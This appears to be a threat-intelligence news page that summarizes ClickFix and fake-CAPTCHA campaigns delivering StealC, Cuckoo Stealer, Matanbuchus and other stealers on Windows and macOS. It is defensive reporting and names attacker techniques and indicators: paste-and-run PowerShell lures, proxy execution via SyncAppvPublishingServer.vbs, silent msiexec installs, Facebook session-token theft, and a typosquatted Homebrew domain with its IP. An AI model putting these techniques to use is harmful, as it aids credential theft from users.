Fake CAPTCHA and ClickFix Social Engineering Used to Deliver Stealer Malware
A wave of social-engineering-driven malware delivery is abusing “verification” and “fix” workflows to trick users into running attacker-supplied commands that install information stealers. LevelBlue reported a campaign using fake Cloudflare-style CAPTCHA pages on compromised websites to convince Windows users to manually execute malicious PowerShell commands, resulting in StealC deployment; StealC is described as exfiltrating browser credentials, crypto wallet data, Steam and Outlook credentials, system information, and screenshots over RC4-encrypted HTTP to a C2 server. Intego also identified an evolved ClickFix technique on macOS (“Matryoshka”) that leverages typosquatting to redirect users to pages instructing them to paste “fix” commands into Terminal; the loader then retrieves an AppleScript payload to steal browser credentials and target wallet apps (e.g., Trezor Suite, Ledger Live), including repeated fake password prompts as a fallback.
Separately, other credential-theft campaigns are also leaning heavily on lures that exploit user trust and routine workflows. Morphisec described Noodlophile evolving from fake AI video platform ads to fake job postings and phishing “assessments,” delivering multi-stage stealers/RATs via techniques including DLL sideloading, while continuing to use Telegram bots for exfiltration/C2 and adding file-bloating content intended to disrupt automated analysis. These developments reinforce that user-in-the-loop execution (copy/paste commands, “verification” steps, and recruitment-themed forms) remains a high-yield initial access vector for stealers across both Windows and macOS environments.
Related Entities
Malware
Organizations
Affected Products
Sources
Related Stories
Fake CAPTCHA/ClickFix Social Engineering Used to Deliver Malware and Steal Sessions
Threat actors are increasingly using **fake CAPTCHA / verification pages** as a scalable social-engineering lure to deliver malware and steal credentials by abusing users’ trust in routine web security checks. Research highlighted a large, fragmented ecosystem of lookalike fake CAPTCHA pages hosted across **~9,494 compromised sites and malicious properties**, where roughly **70%** of observed pages share near-identical visuals while delivering **dozens of distinct payload variants** via different execution models, including clipboard-driven instructions that lead victims to run **PowerShell** or **VBScript** downloaders. Separately, a **ClickFix** campaign targeting Facebook users—especially content creators and businesses seeking verification—uses fake “verification” portals to trick victims into manually extracting and submitting browser session tokens (notably `c_user` and `xs`) via developer tools, enabling account takeover without exploiting software vulnerabilities. In parallel, the **ClearFake** campaign (a malicious JavaScript framework injected into hacked websites) has adopted ClickFix-style fake CAPTCHA lures and added more evasive “living off the land” behavior, including **proxy execution** to run PowerShell through trusted Windows features and shifting distribution to a **popular CDN**, reducing the effectiveness of defenses that rely primarily on blocking known-bad domains/IPs.
1 months ago
Fake CAPTCHA (ClickFix) Social Engineering Used for Fileless Malware Delivery
Security researchers reported an active malware distribution technique that abuses **bogus CAPTCHA** pages to trick users into executing attacker-supplied commands on Windows. In the **ClearFake** campaign analyzed by Expel, victims land on a compromised site and are instructed to press `Win + R`, then paste and run a clipboard-seeded command—an approach commonly referred to as **ClickFix**—which results in malicious **PowerShell** execution. The campaign emphasizes *living-off-the-land* tradecraft and evasion, including **proxy execution** by abusing the trusted Windows script `C:\Windows\System32\SyncAppvPublishingServer.vbs` to launch PowerShell in hidden mode and reduce the chance of AV detection. Separate measurement and telemetry on the same broader tactic found large-scale infrastructure supporting fake CAPTCHA lures: a Censys analysis identified **9,494** breached websites hosting counterfeit verification pages, with ~**70%** appearing nearly identical. The most common infection mechanisms involved **clipboard manipulation** leading to **VBScript** and **PowerShell** execution (with significant counts of each observed), alongside other delivery paths such as `MSIEXEC`-based installation of malicious Windows Installer packages. Researchers also observed use of the **Matrix** push command-and-control framework to support **fileless** deployment, noting that these intrusions can leave no traditional executable artifacts and may evade signature-based detection.
1 months ago
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
3 weeks ago